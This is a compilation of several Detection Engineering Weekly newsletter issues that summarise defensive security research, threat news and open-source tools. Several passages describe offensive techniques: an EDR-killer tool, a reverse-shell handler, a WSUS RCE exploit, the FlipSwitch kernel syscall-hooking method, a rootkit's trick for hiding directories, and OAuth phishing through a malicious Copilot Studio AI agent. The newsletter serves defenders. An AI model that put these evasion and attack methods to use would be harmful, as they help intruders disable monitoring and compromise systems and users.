center-for-threat-informed-defense/attack-workbench-frontend

ATT&CK’s frontend application that serves as a self-hosted knowledge base for detection engineers and the ATT&CK library. With the latest v18 release, you’ll see additional resources leveraging Detection Strategies.

loosehose/SilentButDeadly

EDR killer technique that leverages the Windows Filtering Platform to prevent EDR agents from phoning home to cloud infrastructure. Super useful for preventing alerts from being sent to the cloud, but could still be noisy as an EDR evasion technique.

zopefoundation/RestrictedPython

Sandbox-like Python runtime execution environment for running untrusted code. It’s not a sandbox like a virtual machine, but it’s a subset of the Python language that restricts risky primitives in Python that can be used maliciously.

malwarekid/OnlyShell

Go-based reverse shell handler that integrates several types of reverse shells into one interface. So if you have a bash reverse shell and a PowerShell cmdlet reaching out, it will automatically detect the environment and shell type so you can select via its TUI-like interface.

Detection Engineering Weekly
DEW #135 - Chaos Detection Engineering, Connecting Policy to IR playbooks & Spooky AWS Policies 29 October 2025 at 13:03

DEW #135 - Chaos Detection Engineering, Connecting Policy to IR playbooks & Spooky AWS Policies

Detection Engineering Weekly

By: Zack Allen

29 October 2025 at 13:03

Welcome to Issue #135 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week

I’m helping host the second edition of Datadog Detect tomorrow! We have an excellent lineup with folks I’ve featured several times on this newsletter. It’s fully free, fully online, and also available on-demand. We have a small capture the flag afterward to win some socks.
- 👉 Register Here 👈 and don’t forget to meme out in the webinar chat like last time.
- We had close to 1000 chatters so it felt like a Twitch stream
I’m all booked for London and got some excellent pub and restaurant recommendations. Please keep them coming :D

This Week’s Sponsor: detections.ai

Community Inspired. AI Enhanced. Better Detections.
detections.ai uses AI to transform threat intel into detection rules across any security platform. Join 9,000 detection engineers leveraging AI-powered detection engineering to stay ahead of attackers.
Our AI analyzes the latest CTI to create rules in SIGMA, SPL, YARA-L, KQL, and YARA and translates them into more languages. Community rules for PowerShell execution, lateral movement, service installations, and hundreds of threat scenarios.
Join @ detections.ai
Use invite code “DEW” to get started

💎 Detection Engineering Gem 💎

How to use chaos engineering in incident response by Kevin Low

Hey look, security steals SRE concepts again and it’s a beautiful thing! Jokes aside, this is a concept I’ve believed heavily in since I started working professionally with SRE organizations 10+ years ago. Chaos engineering is a practice that intentionally injects faults into a production system to test resiliency and build confidence in the face of resiliency failures. Basically, it challenges you to break something to see how fast you can react and recover to an outage, almost like intentionally popping a tire on your car to see how well you react and can change it.

This seems applicable to security, no? That’s where Low’s post comes in to test the idea. First, Low makes a gentle introduction to the concept and then presents a test architecture and a threat model in an AWS environment to experiment with.

Figure 2: Architecture after GuardDuty detects unexpected activity and the security team isolates the EC2 instance

In this scenario, a microservice experiences some unexpected security activity and GuardDuty generates an alert. If you shut down an EC2 instance, what exactly happens? Enter Chaos Engineering!

There are five steps in a Chaos Engineering experiment: defining the steady state, generating a hypothesis, running the experiment, verifying the effects, and improving the system. This has a nice carryover for testing detections and their infrastructure in production states.

Steady State: What is our baseline for MTTR and MTTD? What is the general uptime of our log sources? What configurations are in place to prevent attack paths?
Hypothesis: When a workstation queries a known malicious domain, our SIEM will detect it within 15 minutes, notify the security team within 2 minutes, and the machine will be contained 1 minute after that
Running the experiment: Load a benign domain inside your threat intelligence look up tables, remotely connect to a machine and perform a DNS lookup for the benign domain.
Verifying the effects: Did we generate an alert in the SIEM? Was there a Slack notification to contain the host? Did it fall within our hypothesis’ parameters?
Improving the system: The Slack alert did not defang the domain, the containment tooling only blocked the domain and not the resolution IP

I love this approach, and I’m unsure whether any companies are considering this type of fault or “adversary injection”- style testing. Breach Attack Simulation products focus on coverage of rules, but I haven’t seen anyone think about this from a Detection & Response validation angle.

🔬 State of the Art

A Retrospective Survey of 2024/2025 Open Source Supply Chain Compromises by Filippo Valsorda

In this post, Valsorda performs a retrospective survey analysis of all open-source supply chain attacks from 2024 to 2025. At Datadog, we collect 100s to 1000s of these types of malicious packages to help defend our environment, but a supply chain compromise is more than just a malicious package. These last 3 months alone have had compromises that made mainstream news, such as Shai-Hulud and s1ngularity.

Valsorda grouped the root causes of 17 major attacks to help readers understand initial access and subsequent attack paths. Funny enough, phishing was the number one root cause of these package takeovers, and the number two was a new attack path I haven’t been able to put into words: control handoff. The basic premise behind control handoffs is that it’s part social engineering, and IMHO, part insider threat. For example, the infamous xzutils attack originated when a developer gradually added a backdoor to the library over time. The polyfill[.]io attack involved purchasing a domain that had expired and the new owner served malicious Javascript to victims.

It’s a fascinating read as a survey blog, but it highlights how fragile the open-source software ecosystem is. It’s unfair how large companies and organizations demand feature and security work from some of these projects without pay, and, understandably, burnout from these demands has become a real security issue once attackers exploit them.

Re-Writing the Playbook — A detection-driven approach to Incident Response by Regan Carey

Merging governance, risk and compliance documents and policies across an organization is difficult. I think the most salient example of incorporating a policy into practice is mandatory 2FA. You write a policy that mandates 2FA, perhaps based on a SOC2 or ISO27001 audit, and your IT team buys physical YubiKeys and Google Workspace to ensure that all authentication requires a USB-C dongle.

This gets harder and more nebulous in the threat detection space. 2FA is clean and measurable; you can pull reports of the number of employees enrolled in 2FA and drive it to completion. But, how do you drive a Ransomware Response Playbook into completion? Is it that you have a playbook? Is it that you have EDR tooling, plus a playbook? Or is it that you have a playbook, you have EDR tooling, and you have Bob from IT who presses a button when an EDR fires?

But what about individual rules that respond to ransomware? Are they firing accurately? Is the SPECIFIC response playbook inside the rule up to date? When do you know it's out of compliance with the overall playbook? I think the answer is: you don’t and you won’t. This is where Carey begins their exercise and proposes their Incident Response Diamond concept.

Translation and mutation of data can result in loss of specificity, which is no different from a data engineering pipeline problem. Data engineering solves this through meticulous field mapping and clear documentation. I think this is what the Diamond concept Carey is proposing here. Basically, they define a handoff between non-technical playbooks into rules, but they keep a lineage of how certain playbooks are invoked by rules so you know which policy it falls under.

I think this is a great approach, but it means your security response and GRC teams need lots of alignment to pull it off. Documentation is one of the hardest parts of security, and keeping rules up to date is already hard enough.

Fantastic AWS Policies and Where to Find Them by David Kerber

The hardest thing in Computer Science is cache invalidation. The second hardest thing in Computer Science is naming things. For security, I think the hardest thing is understanding cloud identity models. The second hardest thing is also naming things.

One of the best ways in AWS to reduce the blast radius of attacks, or prevent attacks altogether, is to leverage the myriad of AWS policies that they make available to customers. But a word of caution from Kerber: the amount of tools you have at your disposal here can also be your downfall. In fact, as Chester Le Bron puts it:

You now need to become a SME in the operating system called AWS and its core services, some of which (like IAM) could be considered its own OS due their complexity

So, in this post, Kerber outlines every type of AWS policies to help manage access. There are several types, some allow you to Allow or Deny access, while others only Deny, and you can split these types across things like Users, Resources, Service Accounts and even GitHub Actions.

Luckily, each section is split up to help folks use this blog as a reference post in case you need to come back to remember. They also open-sourced a tool called iam-collect to help retrieve all of these policies locally for analysis. I’ll list the tool at the open-source section at the bottom of this week’s issue!

Introducing CheckMate for Auth0: A New Auth0 Security Tool by Shiven Ramji

CheckMate is a free Auth0 tenant configuration tool that operates as a CSPM for Auth0 deployments. They have several checks for all kinds of misconfigurations present in the Auth0 environment, and you can run them on an interval to detect drift of the environment and fix it before it becomes a problem. One of the cool parts here that is less CSPM-y from a pure security product perspective is their extensibility runtime checks. It’ll do several checks against custom Auth0 runners to find everything from hardcoded passwords to vulnerable npm packages.

☣️ Threat Landscape

UN Convention against Cybercrime opens for signature in Hanoi, Viet Nam by United Nations Office on Drugs and Crime

The United Nations host their “Convention on Cybercrime” in Vietnam last week. Besides sounding like a sick conference (I hope someone wore a hacker hoodie), they had 72 countries sign an international treaty that provides guidance and guardrails for nations to battle international cybercrime. The post has some interesting highlights from the treaty, including standards for electronic evidence collection, the ability to share data easily, and it recognizes that the dissemination of non-consensual sexual images is an offense.

Lessons from the BlackBasta Ransomware Attack on Capita by Will Thomas

Cyber threat intelligence G.O.A.T. Will Thomas dissected the 136-page ICO report on Capita Group’s breach by BlackBasta in 2023 for some juicy intelligence and lessons learned. The cool part of this is that Will found messages from the BlackBasta chat leak that line up with the timeline published in the ICO report.

It’s nice to get commentary from a CTI expert on publicly facing penalty notices and disclosures. Lessons learned are great at a high level, but digging into exact TTPs from BlackBasta and comparing them to the material failures within the security program at Capita are way more useful to the rest of the security community.

CVE-2025-59287 WSUS Unauthenticated RCE by Batuhan Er

This week, Microsoft released an out-of-band vulnerability update for its Windows Server Update Service (WSUS) product. WSUS allows Microsoft administrators to manage the installation Windows updates in their fleet. The deserialization vulnerability results in Remote Code Execution, so Microsoft labeled CVE-2025-59287 as a 9.8.

In this vulnerability walkthrough, Er follows the vulnerable code path and ends with a PoC to exploit the vulnerability. The discovery here is that WSUS deserializes encrypted XML objects unsafely in the GetCookie() endpoint. You can send over any arbitrary object (or a specially crafted one) to get RCE.

Exploitation of Windows Server Update Services Remote Code Execution Vulnerability (CVE-2025-59287) by Chad Hudson, James Maclachlan, Jai Minton, John Hammond and Lindsey O’Donnell-Welch

As a follow-up post to Er’s above, the Huntress team found in-the-wild exploitation of CVE-2025-59287. A handful of their customers had Internet-exposed WSUS servers. When the vulnerability details and subsequent PoCs dropped, attackers leveraged the exploit against exposed servers. Most of the activity looked like initial reconnaissance, but this post goes to show how fast you have to react to emerging vulnerabilities, especially when you have misconfigurations that could have prevented exploitation.

The team also dropped a Sigma rule and IoCs for readers to hunt on.

Hugging Face and VirusTotal: Building Trust in AI Models by Bernardo Quintero

This is a ~small product update for VirusTotal’s integration into HuggingFace’s registry of AI models. I usually don’t post product updates, but both VirusTotal and HuggingFace are community-driven products. It’s nice to see the VirusTotal team commit to helping developers identify malicious models hosted on HuggingFace.

🔗 Open Source

auth0/auth0-checkmate

GitHub link for the Checkmate project that was open-sourced by the auth0 team. You can see all of their checks in code and it looks like it operates similarly to how prowler works.

cloud-copilot/iam-collect

Kerber’s iam-collect repo from the story I linked in State of the Art above. Give it access to your AWS environment and it’ll rip through the IAM policies and download them to disk. It links to a separate GitHub project called iam-lens to help simulate and evaluate effective permissions.

EmergingThreats/pdf_object_hashing

PDF Object hashing is a technique similar to imphash where you compare structures of PDF documents without focusing on the content inside. impash is a helpful technique with identifying similar binary features and symbols so you can cluster malware samples to find new ones. This follows the same philosophy so you can cluster malicious PDF documents using similar techniques.

chainguard-dev/malcontent

I’ve been following Chainguard’s malcontent project for a while and it looks like they’ve been throwing a lot of development at it. It’s a supply-chain compromise detection system that uses a butt-ton (yes, a butt ton) of analysis techniques, including close to 15,000 YARA detections, to help detect these compromises before they make it into your build and production systems.

ForensicArtifacts/artifacts

Machine-readable knowledge base of forensic artifact information. It has a good amount of yaml files that store metadata around specific sources and what files and directory paths you can use during forensic analysis.

Detection Engineering Weekly
DEW #134 - Prioritizing Critical Assets, AI SOC means MORE alerts and Microsoft CoPilot Phishing 22 October 2025 at 14:03

DEW #134 - Prioritizing Critical Assets, AI SOC means MORE alerts and Microsoft CoPilot Phishing

Detection Engineering Weekly

By: Zack Allen

22 October 2025 at 14:03

Welcome to Issue #134 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week

I popped and tore muscle/cartilage in my ribs on Friday. Urgent care sent me to the ER, and the ER laughed at me and said I’m too young to hurt my ribs and come to the hospital, so they sent me home D:
I’m booking a (small) solo trip to London in December. Who’s got restaurant and more importantly Pub recommendations in the Soho area? Shoot me a message and i’ll buy you a (virtual or not) pint!
I get some AMAZING content sent to me in all kinds of mediums, but it’s hard for me to keep track. So, I made a submissions form @ https://submit.detectionengineering.net that sends your blog details straight to my Notion. If you are writing something, I want to know!

This Week’s Sponsor: detections.ai

Community Inspired. AI Enhanced. Better Detections.
detections.ai uses AI to transform threat intel into detection rules across any security platform. Join 9,000 detection engineers leveraging AI-powered detection engineering to stay ahead of attackers.
Our AI analyzes the latest CTI to create rules in SIGMA, SPL, YARA-L, KQL, and YARA and translates them into more languages. Community rules for PowerShell execution, lateral movement, service installations, and hundreds of threat scenarios.
Join @ detections.ai
Use invite code “DEW” to get started

💎 Detection Engineering Gem 💎

Critical Asset Analysis for Detection Engineering by Gary Katz

If everything is Priority, nothing is Priority

I think about this mantra when I am looking at team planning for our security org at $DAYJOB. Security has a thankless job in many ways: when things go wrong, we are both in the spotlight and under a microscope. When things go well, we may seem invisible to others. This means scrutiny comes at the worst times, such as during an emergency, and the amount of planning and prioritization you do beforehand can really showcase how mature you are as a security program.

Lots of detection blogs I read talk about sending telemetry into a SIEM or a logstore and how to run detection logic over that telemetry. These blogs have a large assumption: every piece of telemetry is created and maintained equally. In the real world such as business, this is the furthest from the truth. A workstation going offline versus a domain controller going offline is an example here, and what Gary calls a “chokepoint.”

These chokepoints are assets that become the biggest target for adversaries, and labeling them as Critical Assets provides clarity to your security team and your leadership team that you are putting focus in the right spots. The Critical Asset approach here requires conversations up and down your reporting chain, but it should render insights into what a detection team should prioritize first:

I love this approach because it shifts the conversation away from 100% MITRE coverage across everything to focused and directed coverage on your organization’s most critical services and assets. According to Katz, this methodology should output a prioritized list of assets, relevant attack paths, and coverage metrics that you can provide to others in your organization to showcase the value in peacetime (not during an incident).

The only part of this approach that I struggle with, not specifically with Katz’s but in general, is that it’s hard to highlight coverage on assets as the list grows.

🔬 State of the Art

How AI Transforms Detection Engineering by Filip Stojkovski

Like most things in security, detection engineering is a capacity problem. Every security operations function has three knobs to dial to scale their org, and they all come at some cost: people, process, and technology. SOCs address the need for scale through people, but it’s not linear because you can only triage more alerts with more people. This is where process and technology help scale the function, especially if you have a solid engineering foundation and a healthy department culture that constantly updates processes.

One of a detection engineer’s most potent “knob” is tuning how much or how little threat activity and benign traffic you capture. So, according to Stojkovski, this knob has always leaned towards precision (what we capture is relevant), as we don’t want to overwhelm the capacity of triage analysts. But, does this change with the advent of AI SOC technology?

Stojkovski argues it does, and I will have to agree here. LLMs help us turn the “technology knob” way way way up, which means we gain a scale advantage that isn’t pinned to linear growth of humans. I also really like their nuance that the focus of this tech should be on true positive benigns and false positives, which means analysts focus more on real incidents versus wasting time tuning alerts that can waste 10-15 minutes of an analyst’s time.

CoPhish: Using Microsoft Copilot Studio as a wrapper for OAuth phishing by Katie Knowles

~ Note, Katie works at Datadog and is my colleague ~

AI-based features introduce risk we’ve never seen before, and it’s easy to see why the hype matters. Prompt injections lead to some funny outcomes, but the more overlooked part of AI implementation is tried-and-true vulnerabilities. Developer teams are being forced to push features out so they don’t last to market, and misconfigurations and non-standard development workflows creep into production, leaving users and organizations alike vulnerable.

This is the case with Katie’s latest research into Microsoft’s CoPilot studio. CoPilot studio is Microsoft’s workbench product for developers who want to create AI chatbots. According to Katie, it has some confusing UI/UX workflows for authenticating to a chatbot, as well as poor permission structures, which allow attackers to create OAuth Consent Phishing attacks.

An attacker can use a malicious Copilot Studio agent to trick a target into an OAuth phishing attack. The attacker or agent can then take actions on the user's behalf (click to enlarge).

Desired State Configurations by smash_title

This is the first time I’ve heard of Microsoft’s infrastructure-as-code and configuration management policy language, Desired State Configurations (DSC). So, this was a helpful post for me to understand Microsoft’s approach to DevOps using native tooling from the hyperscaler. smash_title came across this technology set while creating a detection engineering-style lab for Azure Virtual Machine Windows and Linux detection testing.

It does look similar to the likes of Terraform and Ansible depending on which of the three versions you are using. There are some neat features that I don’t think I’ve seen in other similar technologies, such as drift detection and correction, and workstation resource management. It looks like Microsoft is sunsetting the earliest version that relies on PowerShell, and wants to move to a pure JSON/YAML-style declarative format, but they seem to be pretty far away from feature completeness on the newer versions.

Introducing HoneyBee: How We Automate Honeypot Deployment for Threat Research by Yaara Shriki

HoneyBee is an open-source toolset that automates the creation of honeypot stacks leveraging LLMs. Unlike other honeypots that put LLMs inside the web-app to mimic an environment, this one focuses on the configuration management and infrastructure component, which I think is a much more fruitful approach for detection engineers.

You provide access to your favorite foundational model, select a technology stack, and select one or many misconfigurations in the Wiz catalog, and it generates docker-compose files for use. This is helpful when you are building detections for specific stacks and want to see how telemetry is generated after a misconfiguration is exploited. Alternatively, you can deploy this on a honeypot listening on the Internet to collect indicators of compromise.

From Logs to Leads: A Practical Cyber Investigation of the Brutus Sherlock by Adam Goss

This is an in-depth walkthrough of the forensics challenge “Brutus” on hackthebox. I like Goss’s approach of splitting the investigation into four distinct skillsets: interpretation, collection, capability comprehension, and manipulation. Each one of these skills involves understanding a target system’s technology stack, gathering necessary data from various sources, and then using the tooling you have at your disposal to interpret the timeline of events.

☣️ Threat Landscape

[RESOLVED] Increased Error Rates and Latencies by Amazon Web Servers

What a crazy turn of events: a cascading DNS failure starting in AWS DynamoDB, which then affected an internal service supporting launching EC2 instances, which then messed up health checks on load balancers and spread through 142 separate services.

To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER by Wesley Shields

This GTIG blog is a great example of how threat actors can rapidly adjust their malware development as they deploy it. Shields profiles COLDRIVER (aka Star Blizzard)’s new malware delivery chain. It uses phishing as the initial lure, which leads to a ClickFix infection. During the infection, COLDRIVER leveraged a clunky Python-based backdoor, then began simplifying the malware away from Python and focusing on PowerShell. It looks like COLDRIVER abandoned Python because it needed a Python runtime to execute, whereas PowerShell is native functionality in their victim set.

Email Bombs Exploit Lax Authentication in Zendesk by Brian Krebs

Threat actors bombarded customers of large Zendesk customers last week using flaws in how Zendesk is configured. The misconfiguration allows people who have access to company Zendesk portals to send out ticket creation notifications that come from the company domain. Most of these were spam and troll-style messages, even some accusing Krebs of breaking the law.

But it goes to show how SaaS apps have multiple layers of configuration and can lend themselves to abuse scenarios like this if someone looks hard enough.

Revelations on Group 78, the secret US task force that fights cybercriminals by Martin Untersinger and Florian Reynaud

I was skeptical reading this headline because I’ve been burned by mysterious marketing-style blog posts, but then I realized it was an expose from Le Monde. Untersinger and Reynaud provided readers some extraordinary background into the alleged FBI Ransomware Disruption Taskforce, Group 78. The goal of the group is to perform ransomware disruption operations, up to and including arrests of suspected ransomware operators. They leverage a variety of legal and more modern tactics, such as exposing criminals' identities.

The hope is to pull all the levers they can find to degrade the trust between ransomware groups, and to be honest, I like this approach. For example, Untersinger and Reynaud assert that the ExploitWhisperer leak of over 200,000 BlackBasta Telegram messages may have been from Group 78.

🔗 Open Source

smashtitle/DesiredStateConfigurations

smashtitle’s GitHub repository for their DesiredStateConfigurations research, I posted above in the State of the Art section. The cool part about this is that it’s a single PowerShell script that sets up a lab environment tailored for detection engineering on Windows. It removes a lot of B.S. out of the box services and applications that may cause a lot of noise for people who run the lab.

yaaras/honeybee

Repository from Shriki’s research on building honeypots using LLMs. They have a neat misconfiguration index that you can use as a dropdown in your prompt on specific technologies, so that you not only build the honeypot but also intentionally misconfigure it for detection rule coverage and lure the bad guys to exploit it.

dobin/DetonatorAgent

Detonation platform for malware development and telemetry collection. The initial idea was to develop malware and test it with Windows via the DetonatorAgent Virtual Machine. It can collect telemetry from the environment as well as from EDR.

google/osdfir-infrastructure

Helm Charts for various open source DFIR infrastructure built at Google. You can run things like minikube locally to take advantage of this, or even deploy it up on managed Kubernetes on AWS or GCP.

Detection Engineering Weekly
DEW #133 - Redefining Security Visibility, TTP-First Hunting & F5 breach 16 October 2025 at 14:03

DEW #133 - Redefining Security Visibility, TTP-First Hunting & F5 breach

Detection Engineering Weekly

By: Zack Allen

16 October 2025 at 14:03

Welcome to Issue #133 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week:

I did a family road trip for the long weekend to my hometown. I’m happy to report to other parents that I’ve had my first experience of a kid throwing up in the backseat. Do I earn a badge of honor here?
Datadog Detect is BACK for round 2, so please sign up and see some excellent Detection Engineering talks! It’s free, fully remote, and there will be activities (yay!) and labs for conference goers.

⏪ Did you miss the previous issues? I’m sure you wouldn’t, but JUST in case:

💎 Detection Engineering Gem 💎

What Does “Visibility” Actually Mean When it comes to Cybersecurity? by David Burkett

The most frequent question I get from my boss at Datadog is “Are we covered?” It’s a simple question, but it’s extremely hard to answer. What does covered mean? Are we covered now, before, or in the future? Do you mean MITRE rule mappings, operational maturity, incident readiness, or threat intelligence awareness? It turns out that agreeing on a singular definition of anything in security is difficult!

It was nice to read Burkett’s post here discussing the varying definitions of visibility. Like most industry standards, several companies and organizations have attempted to define visibility, but no single standard or definition has emerged as the true winner. David adapted Splunk’s blog on observability into the security operations space, and I think it works beautifully:

Visibility is the holistic state wherein a system generates telemetry, is subject to robust monitoring for known conditions, and possesses observability, enabling deep, exploratory analysis to diagnose novel problems. Full visibility is achieved only when these three elements are cohesively integrated, allowing operators to move fluidly from detecting a known issue (monitoring) to exploring its unknown root cause (observability), all supported by a common foundation of high-quality data (telemetry).

He then fits this mental model into a 3 tiered definition based on who is asking about visibility. The three tiers look like they are inspired by tiered types of threat intelligence: strategic, operational and tactical. This is also a great approach because visibility means something different based on the customer you are talking to.

Senior leaders typically care about the full visibility of the business, not necessarily the individual elements along the ATT&CK chain. When you get to operational, you focus on the attack surface, such as endpoint, network, and SaaS. Each one of these attack surfaces can have many telemetry sources, think EDR and Secure Web Gateway for domain visibility. Lastly, he rounds out tactical visibility by examining specific telemetry sources, like EDR, and moving through MITRE ATT&CK to assess visibility in each stage.

All models are wrong; some are useful. This may not be “perfect” in terms of defining visibility, but in my opinion, it’s a good mental model. It pulls inspiration from SRE concepts like observability and fits that into the context of a security program’s healthiness based on the customer who is asking.

🔬 State of the Art

Hunting Beyond Indicators by Sam Hanson

Threat Hunting is the art of managing false positives. The basic idea is that you switch the premise of triage. Detection engineering and hunting means you want to cast a wide net in your queries to find needles in a haystack, but in the former, you want as little hay as possible. Maybe I can keep this imagery going and talk about separating wheat from chaff?

Alright, alright, enough farming analogies. I included this post because it shows the tradeoffs of hunting when starting with threat intelligence indicators versus adversary TTPs. When you plan and execute a threat hunt, the expectation is to find many results and have time to sift through them, using down-selection techniques to determine if there is an intrusion. The order of down-selection matters, though. According to Hanson, you want to start with tactics and techniques first (which I agree with), and then filter by other components like threat intelligence indicators.

If you start with threat intelligence indicators, you introduce a selection bias because they are brittle selectors and, by nature, won’t catch unknown IOCs. Focus on TTPs first, down-select to find unknown IOCs, and feel free to use IOCs after for additional enrichment.

Intuition-Driven Offensive Security by Andy Grant

When I first started working in security, becoming a red-teamer or a pentester felt like a class of jobs reserved only for the most technical experts in the field. There’s something beautiful in deconstructing assumptions of systems, building tools to probe those assumptions for weaknesses, and then exploiting those assumptions to achieve that objective. At the time, I was only aware of jobs at consulting firms that had intense interview processes, so I never felt I could make it.

As I progressed in my career, I started to meet and work with red teams. They typically fit into a mold where they engage and produce a report. As a blue teamer, it was hard for me to understand the value of a report when the engagement with that same team stopped after the delivery. I think this was the same feeling that some other companies felt after engaging a pentesting firm. The hard work started with the findings, not the engagement.

Grant visits this concept and provides a better working model for red teamers that he dubs as intuition-driven security. The three principles he lays out focus on understanding the risk behind an implementation rather than hunting and reporting bugs. IMHO, this is a much sounder approach because it forces red teamers to think like a security engineer rather than a pentester. If the outcome is risk reduction, the incentive structure rewards knowledge of the engineering behind a service. This knowledge drives empathy of the problems the service solves and serves as a forcing function on closing the security gaps the team finds during an engagement.

Practical Resources for Detection Engineers. || Starters 🕵🏻 and Pro || by Goodness Adediran

I love reading “Introduction to Detection Engineer” posts because you get a good diversity of thought around how to break into the field. Some folks focus on the expertise required to break into it, but can leave it vague enough to make it easy to retrofit into your life situation. Others may look at more tactical details like technologies to learn, such as SIEMs or languages. Adediran took an approach that I first saw from Katie Nickels’ in her series on self-studying for Threat Intelligence.

This post provides a self-study roadmap for readers who want to break into detection engineering. Adediran splits this up into foundational blogs on the subject, studying MITRE to get a better understanding of how it maps to rules, and then crescendos out to specialist subjects across several mediums like blogs, videos, books, open-source repositories and podcast episodes.

Purple Team Maturity Model: From Chaos to Controlled Chaos by Silas Potter

I’m a big fan of maturity models, because they set a clear direction and roadmap for a program or function, but leave enough wiggle room to add, remove, or change milestones to fit your business context. In my professional experience, they’ve helped me set a tone for reporting maturity to leadership and provide an excellent north star for folks reporting into my org. So, when a new “maturity” model pops up in my feed, I almost always read it and steal ideas to use for my own purposes :).

Purple Teaming is an excellent way to improve the operational robustness of your detection program, so I was pleased to see Potter’s approach here to quantify how to achieve a well-oiled purple teaming function. Notice that this isn’t about a specific team doing purple teaming; instead, it’s a program across multiple teams, the obvious one being the joining of red and blue teams. I like this approach because it helps unite two teams who may not be talking to each other and showcases the value of both functions by driving detection outcomes rather than churning out rules or red team reports.

☣️ Threat Landscape

K000154696: F5 Security Incident by F5

Network and security appliance F5 posted a harrowing security incident update involving a “highly sophisticated nation-state threat actor.”. This threat actor had long-term access to their product development environment, and according to cvedetails, F5 has close to 300 products. With the ability to download code and knowledge bases, a well-resourced actor could use that access to do product research and reverse engineering for competitive products in their home country or for the ease of vulnerability research.

Securing the Future: Changes to Internet Explorer Mode in Microsoft Edge by Gareth Evans

The Microsoft Edge security team installed a new secure-by-default configuration for Internet Explorer Mode in Microsoft Edge. This is the first time I’ve heard of Internet Explorer Mode, and I already had a chuckle reading this because I had a feeling it had to do with active exploitation of legacy Internet Explorer code shipped inside Edge, and voila!

The team seemed to plug the holes of some of the exploit vectors, but they switched off certain UI elements by default to limit the blast radius of threat actors abusing the backward-compatible technology. Basically, if you have to use this mode, it’s shipped with minimal functionality to access the resources you need, and an administrator must turn on any additional functionality.

Rubygems.org AWS Root Access Event – September 2025 by Shan Cureton / Ruby Central

Long-lived access key security incidents strike again! Cureton, the Executive Director for Ruby Central, published a detailed security incident report after a blog post disclosed to the open source community that a former maintainer had production access to Ruby’s AWS account. The blog showed several screenshots and a CLI command that purported the open source maintainer maintained access via an AWS Access Key.

In response to the post, the Ruby Central team performed a series of containment actions to remove this access, and did not accuse the maintainer of anything malicious. But the post and this incident report show how hard it is to maintain a governance structure for an open-source non-profit that relies on contractors and volunteers to maintain the project.

Singularity: Deep Dive into a Modern Stealth Linux Kernel Rootkit by MatheuZSec

Two weeks in a row, I’ve read some great pieces on modern Linux Kernel Rootkits, so it was nice to see this one looked at a rootkit leveraging ftrace style hooking for its persistence and evasion capabilities. MatheusZ breaks down the source code within the rootkit itself, including the hooking techniques, and highlights some differentiators between this rootkit and others in the space. The attention to detail the rootkit creator put towards concealment of directories, for example, shows how much of a cat-and-mouse game this is.

When you hide a directory, you may not be able to see its name or contents via list commands, but you may leak metadata that a hidden directory exists. For example, if a directory contains three subdirectories and you hide one, ls will show only two subdirectories. However, the parent directory’s link count (visible via stat or ls -ld) would still reflect three subdirectories unless adjusted.

This discrepancy between the visible subdirectory count and the link count is a forensic artifact that can reveal hidden directories. This rootkit accounts for the discrepancy and hooks a function to compute the number of links for backdoored directories accordingly.

🔗 Open Source

ngsoti/rulezet-core

This codebase serves the complete application running on rulezet.org. It looks like an open source version of detections.ai that you can host yourself. It pulls in open-source rulesets, and you can use it to manage your own rules via a community-style setup.

eset/malware-ioc

ESET’s long-running repository of malware IOCs is based on blog posts and investigations they’ve done over the years. It’s cool to see commits from close to a decade ago. Each subdirectory has a README describing the malware family and contains the associated IOCs.

KittenBusters/CharmingKitten

For the last two or so weeks, KittenBusters has been publishing commits to this repository that detail the operations behind Iran’s IRGC-IO Counterintelligence division. It is split up into “episodes”, and so far, three episodes have been published. It contains sensitive documents and malware code, and it looks like they will start doxxing certain officials in upcoming episodes.

cisagov/LME

Logging Made Easy (LME) is CISA’s initiative on leveraging open source tools to enable a security operations function on a budget. It uses Wazuh and Elasticsearch, and the target audience is for smaller shops with a small security team or none at all. Probably very helpful for state and local municipalities that CISA works with during incidents.

Detection Engineering Weekly
DEW #132 - Linux Rootkits Evolution, LLM Rule Evals, Oracle 0-day exploitation 8 October 2025 at 14:03

DEW #132 - Linux Rootkits Evolution, LLM Rule Evals, Oracle 0-day exploitation

Detection Engineering Weekly

By: Zack Allen

8 October 2025 at 14:03

Welcome to Issue #132 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week

I spent the weekend hiking in the White Mountains in New Hampshire with my family. Turns out hiking is much harder when you have to carry kids who are strapped in a backpack
I got excited for a new season of The Amazing Race, and all of the competitors are from a separate reality show?? It’s not good
I’m staying away from all discussion around Tayler Swift’s new album

⏪ Did you miss the previous issues? I’m sure you wouldn’t, but JUST in case:

This week’s sponsor: Material Security

No More Babysitting the Security of Your Google Workspace
While your employees communicate via email and access sensitive files, Material quietly contains what’s lying in wait—phishing attacks in Gmail, exposed Drive files, and suspicious account activity. Agentless and API-first, it stops attacks and triages user reports with AI while running safe, automatic fixes so you don’t have to hover. Search everything in seconds, stream alerts to your SIEM, and audit with detailed access logs.
Simplify Your Google Workspace Security

💎 Detection Engineering Gem 💎

FlipSwitch: a Novel Syscall Hooking Technique by Remco Sprooten and Ruben Groenewoud

I first cut my teeth on writing malware when I was the red team captain at my alma mater’s yearly cybersecurity competition. I took a special interest in writing malware for Linux for several reasons. It was a special combination of operating systems knowledge and nuanced differences between kernel versions and Linux distros. It also felt harder than Windows in peculiar ways. For example, Windows is extremely good at backwards compatibility, so writing a piece of malware that interacts with the Kernel in all kinds of ways stays consistent between versions. Whereas in Linux, a single Kernel version update can break backwards compatibility with legitimate and malicious software alike.

That’s what brings us to FlipSwitch. Elastic Security Researchers Sprooten and Groenewoud did a deep dive on the latest 6.9 version of the Linux Kernel and inspected how changes to an array that stores syscall addresses render a classic Kernel rootkit technique useless. The method relies on hooking addresses in the sys_call_table array to point to attacker-controlled code before trampolining back to the original syscall.

Line 10 is the change that killed rootkits like Diamorphine. This is where flipswitch comes in.

The Elastic team did a fantastic breakdown in their blog, so I’ll give my synopsis. The technique involves searching the running kernel’s memory for the specific opcode associated with syscalls that FlipSwitch wants to hook. This opcode is unique, as in, when you load the malicious Kernel module, you can leverage its privilege to look for 0xe8 , enumerate each offset address for the specific function you want to hook via the new x64_sys_call, then patch it.

It’s pretty elegant, and it shows how a singular protection can kill one class of techniques but open up another class to exploit.

🔬 State of the Art

Bridging the Gap: How I used LLM Agents to Translate Threat Intelligence into Sigma Detections by Giulia Consonni

